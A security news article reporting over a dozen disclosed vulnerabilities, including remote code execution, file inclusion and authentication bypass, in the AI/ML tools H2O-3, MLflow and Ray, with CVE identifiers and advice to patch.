Artificial Intelligence

Over a Dozen Exploitable Vulnerabilities Found in AI/ML Tools

Bug hunters uncover over a dozen exploitable vulnerabilities in tools used to build chatbots and other types of AI/ML models.

Bug hunters uncover over a dozen exploitable vulnerabilities in tools used to build chatbots and other types of AI/ML models.

Since August 2023, members of the Huntr bug bounty platform for artificial intelligence (AI) and machine learning (ML) have uncovered over a dozen vulnerabilities exposing AI/ML models to system takeover and sensitive information theft.

Identified in tools with hundreds of thousands or millions of downloads per month, such as H2O-3, MLflow, and Ray, these issues potentially impact the entire AI/ML supply chain, says Protect AI, which manages Huntr.

A low-code machine learning platform, H2O-3 supports the creation and deployment of ML models via a web interface, by just importing data. It allows users to upload Java objects remotely via API calls.

By default, the installation is exposed to the network and does not require authentication, thus allowing attackers to supply malicious Java objects that H2O-3 would execute, allowing them to access the operating system.

Tracked as CVE-2023-6016 (CVSS score of 10), the remote code execution (RCE) vulnerability could allow attackers to completely take over the server and steal models, credentials, and other data.

The bug hunters uncovered two other critical issues in the low-code service, namely a local file include flaw (CVE-2023-6038) and a cross-site scripting (XSS) bug (CVE-2023-6013), along with a high-severity S3 bucket takeover vulnerability (CVE-2023-6017).

MLflow, an open-source platform for the management of the end-to-end ML lifecycle, also lacks authentication by default, and the researchers identified four critical vulnerabilities in it.

The most severe of these are arbitrary file write and patch traversal bugs (CVE-2023-6018 and CVE-2023-6015, CVSS score of 10) that can allow an unauthenticated attacker to overwrite arbitrary files on the operating system and achieve RCE.

Advertisement. Scroll to continue reading.

The tool was also found vulnerable to critical-severity arbitrary file inclusion (CVE-2023-1177) and authentication bypass (CVE-2023-6014) vulnerabilities.

The Ray project, an open-source framework for the distributed training of ML models, also lacks default authentication.

A critical code injection flaw in Ray’s cpu_profile format parameter (CVE-2023-6019, CVSS score of 10) could lead to full system compromise. The parameter was not validated before being inserted in a system command that was executed in a shell.

The bug hunters also identified two critical local file include issues that could allow remote attackers to read any files on the Ray system. The security defects are tracked as CVE-2023-6020 and CVE-2023-6021.

All vulnerabilities were reported to vendors at least 45 days prior to public disclosure. Users are advised to update their installations to the latest non-vulnerable versions and restrict access to the applications where patches are not available. 

Related: The Good, the Bad and the Ugly of Generative AI

Related: OpenAI Patches Account Takeover Vulnerabilities in ChatGPT

Related: Major ChatGPT Outage Caused by DDoS Attack

Related Content

Artificial Intelligence

When not scamming other criminals, criminals are concentrating on the use of mainstream AI products rather than developing their own AI systems.

Artificial Intelligence

Israeli AI security firm Apex has received $7 million in seed funding for its detection, investigation, and response platform.

Artificial Intelligence

Japan's Prime Minister unveiled an international framework for regulation and use of generative AI, adding to global efforts on governance for the rapidly advancing...

Artificial Intelligence

AI-Native Trust, Risk, and Security Management (TRiSM) startup DeepKeep raises $10 million in seed funding.

Artificial Intelligence

Microsoft provides an easy and logical first step into GenAI for many organizations, but beware of the pitfalls.

Artificial Intelligence

CEOs of major tech companies are joining a new artificial intelligence safety board to advise the federal government on how to protect the nation’s...

Artificial Intelligence

New CISA guidelines categorize AI risks into three significant types and pushes a four-part mitigation strategy.

Artificial Intelligence

Pope Francis has called for an international treaty to ensure AI is developed and used ethically, devoting his annual peace message this year to...

Copyright © 2024 SecurityWeek ®, a Wired Business Media Publication. All Rights Reserved.

Exit mobile version